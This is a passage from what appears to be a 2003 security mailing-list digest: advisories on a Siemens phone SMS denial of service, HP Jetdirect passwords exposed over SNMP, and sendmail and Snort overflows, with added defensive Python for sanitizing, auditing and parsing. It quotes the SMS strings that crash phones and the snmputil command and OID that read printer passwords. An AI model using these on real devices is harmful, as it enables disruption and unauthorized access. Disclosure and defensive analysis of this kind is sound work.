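# emulators read as shorthand for ESC [ and ESC ].
_CTRL_TEXT = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f-\x9f]")
_CTRL_BYTES = re.compile(rb"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f-\x9f]")


def _visible(cp: int) -> str:
    """Render a control as a harmless printable token: caret form for ESC, hex otherwise."""
    return "^[" if cp == 0x1B else "\\x%02x" % cp


def sanitize_for_terminal(data: bytes) -> bytes:
    """Neutralize control characters in untrusted output before it reaches a terminal.

    Valid UTF-8 is filtered on code points, so the 0x9f inside 'ß' (c3 9f) is left
    alone while U+009B itself is still caught. Data that is not valid UTF-8 is treated
    as an 8-bit charset in which 0x9b really is CSI and is filtered byte by byte.
    Newline, tab and carriage return are kept; everything else that a terminal could
    interpret is replaced by its visible form.
    """
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return _CTRL_BYTES.sub(lambda m: _visible(m.group(0)[0]).encode("ascii"), data)
    return _CTRL_TEXT.sub(lambda m: _visible(ord(m.group(0))), text).encode("utf-8")


# Constructed samples: the bytes that `echo -e "\23321t"` from the post emits
# (8-bit CSI followed by "21t"), and the 7-bit form of the same sequence.
EIGHT_BIT_CSI_21T = b"\x9b21t"
SEVEN_BIT_CSI_21T = b"\x1b[21t"
```

Piping untrusted text through sanitize_for_terminal before writing it to a tty leaves the sequence visible as `\x9b21t` or `^[[21t` instead of letting the emulator interpret it, whichever of the two encodings the sender chose.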
Siemens *35 and 45 series phones SMS Denial of Service
Information:

The name of vulnerability: Siemens *35-45 DoS SMS Lag
Subject to vulnerability: All versions of Siemens *35 and *45.
Official site: www.siemens-mobile.com
Kind of vulnerability: Refusal in Service (Denial of Service).
Type of vulnerability: Remote / local.
Author: subj ([EMAIL PROTECTED])
Date: 02.03.2003
Site: www.dwcgr0up.com

Description of vulnerability:

There is a local and remote vulnerability in Siemens *35 and *45 series phones. A message of the form "%String", where String is one of the languages from the phone language selection menu, will completely disable *35 series phones and result in a 2 minute read delay on *45 series phones. Note that the first letter of the language should be capitalized and the quotation marks should be present in the message. The phone will try to read the message and then after 2 minutes return to the main menu. This happens every time the message is sent. After 10-15 messages the battery (NiMH) gets empty.

There is a local vulnerability of the same kind. A message of the form "%some_word", where some_word is any lower case letter sequence, will result in the same effects described above.

Vulnerability exploiting:

(for remote): We send to the victim phone the message: "%Deutsch"
Or "%Polski" "%Magyar" "%English" "%Deutsch"

(for local): testedersecurity

Thanks: DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp l0bster, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, dron (Ivanov Andrey)
RE: New HP Jetdirect SNMP password vulnerability when using Web JetAdmin
Sven,

I have been doing some research on the same issue, and it appears that some of the new firmware versions from HP actually fix this vulnerability by replacing the web server with a newer version that doesn't rely on client-side java to verify the password.

The issue at hand stems from the fact that the web server in older firmware versions (and some of the newer firmware versions) relied on client-side java to validate the administrator login. This implementation did not encrypt and send the password to the web server to validate, but retrieved the password through snmp (read: plaintext) from the printer and validated the login on the client side.

As far as the fixes go, neither of the fixes that you outlined will remedy the situation:

1. If you set the snmp community string to anything other than the default, 'internal' (the default for the JetAdmin Web Server) will still work. The snmp community string of 'internal' is, as far as I have been able to tell, unremovable. Once the snmp community strings have been set to whatever non-default string you want, 'internal' still seems to work.

2. If you do not set a password on the JetAdmin Web Server, anyone can change the settings without authentication.

The best solution in this case is to disable the JetAdmin Web Server (if you cannot upgrade the firmware to include the Web Server that isn't written with client-side java) by typing 'ews-config: 0' at the telnet prompt. Once this is done, the password can still be retrieved through the snmp object you mentioned, however no access will be granted (make sure your telnet password is different).

If you upgrade the printer firmware, an easy check to see if the new version is vulnerable is to access the web server: if you see the old, mostly-blue colored page, you're still vulnerable. The new web server will still reply to the snmp request, but from what I've seen, it's always null (all 0x00, 0x00,...)

One more side note: in your example, the raw ascii string is actually 'ABCDUV' :)

Have you talked to HP about this?

Geoff

-----Original Message-----
From: Sven Pechler [mailto:[EMAIL PROTECTED]]
Sent: Monday, March 03, 2003 9:26 AM
To: [EMAIL PROTECTED]
Subject: New HP Jetdirect SNMP password vulnerability when using Web JetAdmin

Hello,

During an analysis of some HP Jetdirect cards I discovered a security issue that could lead to full access to a networked printer. It looks like the vulnerability described in http://www.securityfocus.com/bid/5331, but the OID is different and you can only obtain one specific password. It is also different from the password vulnerability described in http://www.securityfocus.com/bid/3132

It applies to the following situation:
- Any operating system
- HP Jetdirect cards JetDirect 300X (J3263A), JetDirect EX Plus (J2591A), JetDirect 400N (J2552A, J2552B), JetDirect 600N (J3110A, J3111A, J3113A) and older.
- The Jetdirect card is being managed from HP Web Jetadmin.
- A Web Jetadmin device password had been set on the JetDirect card. (This password must be set from Web Jetadmin and has nothing to do with the Telnet password or the SNMP Set community name)

In the above situation the Web Jetadmin device password is readable as plain ASCII text from the JetDirect card using SNMP.

How to check your printers for this vulnerability:

Use an SNMP toolkit to read the following OID from your printer:
.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords
(In numerical format: .1.3.6.1.4.1.11.2.3.9.1.1.13.0)

An example on a Windows machine, using SNMPUTIL from the Windows Resource Kit:

C:\>snmputil get 131.155.120.118 public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0
Value = String 0x410x420x430x440x550x560x3d0x310x300x380 x3b0x000x000x000x00 ..etc...

The resulting string reads in ASCII: ABCDEF=108;
The Web Jetadmin device password is the word before the '=' sign, in this case: ABCDEF

How to protect your printer:
1. Keep the Web Jetadmin device password EMPTY (don't do this on newer cards than the ones mentioned above)
2. Define a 'Set community name' instead

Additional means of protection (does not address the SNMP vulnerability):
3. Define a telnet password (do not keep it empty)
4. Create an 'allow list' from the Telnet console to restrict access from defined IP-addresses

Sven Pechler
University of Technology Eindhoven
Faculty of Technology Management
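Sven's "How to check your printers" step produces the snmputil output quoted above, and Geoff's side note shows how easy it is to misread that hex dump by eye. As an added example (not code from either poster, from HP or from the Windows Resource Kit), the following Python turns the `String 0x41 0x42 ...` rendering into bytes and reports whether the gdPasswords object carries a non-empty password field, which is the condition that marks a card as affected; a patched card that answers with all 0x00, as Geoff describes, is reported as not exposed. The OID is the one from the advisory; the sample value is the advisory's own, kept with its line-wrap artefact so the parser has to cope with it; the function names are constructed.

```python
import re

# gdPasswords object named in Sven Pechler's advisory.
GD_PASSWORDS_OID = ".1.3.6.1.4.1.11.2.3.9.1.1.13.0"

# snmputil prints octet strings as a run of 0xNN tokens. A wrapped line can split a
# token into "0 x3b" (see the quoted output), so whitespace inside a token is tolerated.
_HEX_TOKEN = re.compile(r"0\s*x\s*([0-9A-Fa-f]{2})")

# Constructed sample: the Value line quoted in the advisory, including the wrap artefact.
SAMPLE_VALUE = "String 0x410x420x430x440x550x560x3d0x310x300x380 x3b0x000x000x000x00"


def parse_snmputil_octets(value_field: str) -> bytes:
    """Convert snmputil's 'String 0x41 0x42 ...' rendering into the raw octet string."""
    return bytes(int(h, 16) for h in _HEX_TOKEN.findall(value_field))


def password_field(raw: bytes) -> bytes:
    """Return the text before the first '=' of the NUL-terminated string, or b'' if absent."""
    text = raw.split(b"\x00", 1)[0]
    return text.split(b"=", 1)[0] if b"=" in text else b""


def is_exposed(raw: bytes) -> bool:
    """True when the card returns a non-empty Web Jetadmin device password over SNMP.

    Firmware that has moved to the newer web server answers with all-zero octets,
    which yields an empty field and therefore False.
    """
    return len(password_field(raw)) > 0


def audit(value_field: str) -> dict:
    """One finding per polled printer: whether the password is exposed and how long it is.

    The password itself is deliberately not included so the report can be shared.
    """
    raw = parse_snmputil_octets(value_field)
    return {
        "oid": GD_PASSWORDS_OID,
        "exposed": is_exposed(raw),
        "password_length": len(password_field(raw)),
    }
```

Run over the advisory's sample, parse_snmputil_octets yields "ABCDUV=108;" followed by NUL padding, which confirms Geoff's reading of the hex and flags the card as exposed; the same audit over an all-zero value reports no exposure.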
Re: Siemens *35 and 45 series phones SMS Denial of Service
On Mon, Mar 03, 2003 at 01:06:43AM -, subj subj wrote:
> To vulnerability are subject: All versions siemens *35 and *45.
> [...]
> languages from the phone language selection menu, will completely disable *35 series phones and result in a 2 minute read delay on *45 series phones. Note that

Please note that this vulnerability isn't as serious as you describe it. At least on my S45, I am able to interrupt this 2 minute delay at any time by pressing the 'hang up' key (but I have to press it for about half a second instead of just hitting it), the message can be read by using 'edit message' instead of 'read message', and it can be deleted without problems.

So while this obviously is a bug, it can hardly be called a DoS.

Jan

pgp0.pgp
Description: PGP signature
Re: Security responsible at AOL
A few months ago I submitted a vulnerability about AIM through the appropriate form on their website and to this day I haven't received a response. My advice would be to not bother because they clearly don't care at all.

-BludClot

----- Original Message -----
From: Michael Schwartzkopff [EMAIL PROTECTED]
Date: Sun, 2 Mar 2003 11:58:31 +0100
To: [EMAIL PROTECTED]
Subject: Security responsible at AOL

Hi,

I tried for a long time to contact a security responsible at AOL. I had no chance with the telephone or via web. Is here anybody to tell me whom to contact at AOL.

Thanks.

--
Dr. Michael Schwartzkopff
MultiNET Services GmbH
Bretonischer Ring 7
85630 Grasbrunn
Tel: (089) 456 911 50
Fax: (089) 456 911 21
mob: (0174) 343 28 75
[CLA-2003:571] Conectiva Linux Security Announcement - sendmail
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CONECTIVA LINUX SECURITY ANNOUNCEMENT

PACKAGE : sendmail
SUMMARY : Remote vulnerability
DATE : 2003-03-03 19:30:00
ID : CLA-2003:571
RELEVANT RELEASES : 6.0, 7.0, 8

DESCRIPTION

Sendmail[1] is a widely used Mail Transfer Agent (MTA).

Researchers at ISS[2] discovered and published[3] a remote vulnerability[4][5] in sendmail that could be used by an attacker to execute arbitrary code as root. This vulnerability can be exploited by creating and sending to a vulnerable sendmail server a carefully crafted email message. This message will trigger the vulnerability and arbitrary commands can be executed with administrative privileges. Please note that non-vulnerable mail servers can be used to pass such messages along so that, for example, even internal sendmail servers could be reached.

Starting with Conectiva Linux 7.0, sendmail is no longer the default mail server and has been replaced with Postfix. But sendmail is still shipped in all Conectiva Linux versions. As with many other services, the email service, even if installed, is not started by default in Conectiva Linux.

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2002-1337[7] to this issue.

SOLUTION

All sendmail users should upgrade their packages immediately. After the upgrade, the sendmail service will be automatically restarted if it was already running.

REFERENCES

1. http://www.sendmail.org/
2. http://www.iss.net/
3. http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950
4. http://www.cert.org/advisories/CA-2003-07.html
5. http://www.kb.cert.org/vuls/id/398025
6. http://www.sendmail.com/security/
7. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1337

UPDATED PACKAGES

ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sendmail-8.11.6-1U60_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sendmail-8.11.6-1U70_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/sendmail-8.11.6-2U80_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-8.11.6-2U80_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-cf-8.11.6-2U80_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-doc-8.11.6-2U80_3cl.i386.rpm

ADDITIONAL INSTRUCTIONS

Users of Conectiva Linux version 6.0 or higher may use apt to perform upgrades of RPM packages:
- run: apt-get update
- after that, execute: apt-get upgrade

Detailed instructions regarding the use of apt and upgrade examples can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en

All packages are signed with Conectiva's GPG key. The key and instructions on how to import it can be found at http://distro.conectiva.com.br/seguranca/chave/?idioma=en

Instructions on how to check the signatures of the RPM packages can be found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en

All our advisories and generic update instructions can be viewed at http://distro.conectiva.com.br/atualizacoes/?idioma=en

subscribe: [EMAIL PROTECTED]
unsubscribe: [EMAIL PROTECTED]

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+Y+Nh42jd0JmAcZARAj6TAKDkgvTGscDsT95XBbE/yEO7jjOO9gCgrglI
s7NfdorrA+FnQm0Xy67kRSA=
=ZySZ
-END PGP SIGNATURE-
[Snort-2003-001] Buffer overflow in Snort RPC preprocessor (fwd)
David Mirza Ahmad
Symantec

sabbe dhamma anatta

0x26005712 8D 9A B1 33 82 3D B3 D0 40 EB AB F0 1E 67 C6 1A 26 00 57 12

-- Forwarded message --

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Snort Vulnerability Advisory [SNORT-2003-001]

Date: 2003-03-03

Affected Snort Versions: Any version starting with version 1.8 to those before 2003-03-03 1PM US/Eastern, including 1.9.0 and CVS HEAD (Snort 2.0beta)

Synopsis:

A buffer overflow has been found in the snort RPC normalization routines by ISS X-Force. This can cause snort to execute arbitrary code embedded within sniffed network packets. This preprocessor is enabled by default.

Snort 1.9.1 has been released to resolve this issue. For users using CVS HEAD, a fix has been committed to the source tree.

Mitigation:

If you are in an environment that cannot upgrade snort immediately, comment out the line in your snort.conf that begins:

preprocessor rpc_decode

and replace it with

# preprocessor rpc_decode

Details:

When the rpc decoder normalizes fragmented RPC records, it incorrectly checks the lengths of what is being normalized against the current packet size.

The rpc decoder in Snort 1.9.1 and above contains new alert options that can be used to help detect this attack:

Option                    Default State
alert_fragments           INACTIVE
alert_large_fragments     ACTIVE
alert_incomplete          ACTIVE
alert_multiple_requests   ACTIVE

The first option will alert on any rpc fragmented record it finds. Large fragments will alert when the reassembled fragment record will exceed the current packet length. The incomplete record will alert when there is a partial record found. The alert_multiple_requests will alert when we find more than one RPC request per packet (or reassembled packet).

Download Locations:

Sourcefire has acquired additional bandwidth and hosting to aid users wishing to upgrade their Snort implementation. Binaries are currently not available, this is a source release only at this time. As new binaries become available they will be added to the site.

Source code: http://www.snort.org/dl/snort-1.9.1.tar.gz
GPG Signatures: http://www.snort.org/dl/snort-1.9.1.tar.gz.asc

CVS HEAD (Snort 2.0beta) has been fixed as well.

--
Martin Roesch - Founder/CTO, Sourcefire Inc. - (410)290-1616
Sourcefire: Snort-based Enterprise Intrusion Detection Infrastructure
[EMAIL PROTECTED] - http://www.sourcefire.com
Snort: Open Source Network IDS - http://www.snort.org

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.7 (Darwin)

iD8DBQE+Y+Rtqj0FAQQ3KOARAurPAJ9qzBQCzOG2xxcn2IBfuOlDMjPhJwCfdgiX
M+f1Ccdy03evjCtBT1rq6YQ=
=RhwD
-END PGP SIGNATURE-
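The Details section says the decoder checked fragment lengths against the wrong bound. As an added example (not Snort's rpc_decode code, and in Python rather than Snort's C), the following reassembles RPC-over-TCP record fragments the way a normalizer must: each 4-byte record mark (high bit = last fragment, low 31 bits = length, per RFC 1831 record marking) is checked against the bytes that actually remain in the packet before any data is copied, and the four conditions named in the advisory's option table are raised as alerts under the same names. The function and helper names are constructed; the sample packets are built in the test with the block's own helpers.

```python
import struct

LAST_FRAGMENT = 0x80000000   # high bit of the 4-byte record mark: this fragment ends the record
LENGTH_MASK = 0x7FFFFFFF     # low 31 bits: number of data bytes that follow the mark


def record_mark(length: int, last: bool) -> bytes:
    """Encode a record mark; used to build constructed test packets (length may lie)."""
    return struct.pack(">I", (length & LENGTH_MASK) | (LAST_FRAGMENT if last else 0))


def make_fragment(data: bytes, last: bool) -> bytes:
    """One well-formed fragment: a truthful record mark followed by its data."""
    return record_mark(len(data), last) + data


def decode_rpc_records(packet: bytes, alert_fragments: bool = False):
    """Reassemble the RPC records carried in one packet payload.

    Returns (records, alerts). A fragment is copied only after its declared length has
    been checked against the bytes remaining in the packet; a mark whose length runs
    past the end of the packet raises 'large_fragments' and stops decoding, so a lying
    length can never make the reassembled record larger than the packet it came from.
    """
    records, alerts = [], []
    current = bytearray()
    in_record = False            # a non-last fragment was seen and its record is still open
    offset, end = 0, len(packet)

    def alert(name: str) -> None:
        if name not in alerts:
            alerts.append(name)

    while offset < end:
        if end - offset < 4:
            alert("incomplete")  # trailing bytes too short to hold a record mark
            break
        (mark,) = struct.unpack_from(">I", packet, offset)
        offset += 4
        frag_len = mark & LENGTH_MASK
        if frag_len > end - offset:
            alert("large_fragments")  # declared length exceeds what the packet holds
            break
        current += packet[offset:offset + frag_len]
        offset += frag_len
        if mark & LAST_FRAGMENT:
            if in_record and alert_fragments:
                alert("fragments")    # the record arrived in more than one fragment
            records.append(bytes(current))
            current = bytearray()
            in_record = False
        else:
            in_record = True

    if in_record:
        alert("incomplete")           # packet ended before the record's last fragment
    if len(records) > 1:
        alert("multiple_requests")
    return records, alerts


def normalize_rpc(packet: bytes, alert_fragments: bool = False):
    """Rewrite the payload so every record is one last-fragment record, as a normalizer does.

    Each record costs one 4-byte mark in the output and at least one in the input, so the
    result is never longer than the packet it was derived from.
    """
    records, alerts = decode_rpc_records(packet, alert_fragments)
    return b"".join(make_fragment(r, True) for r in records), alerts
```

The invariant worth keeping in mind is the last one: because every fragment is bounded by the remaining packet length before it is copied, the normalized output fits in the original packet buffer, which is exactly the property the overflowed code lacked.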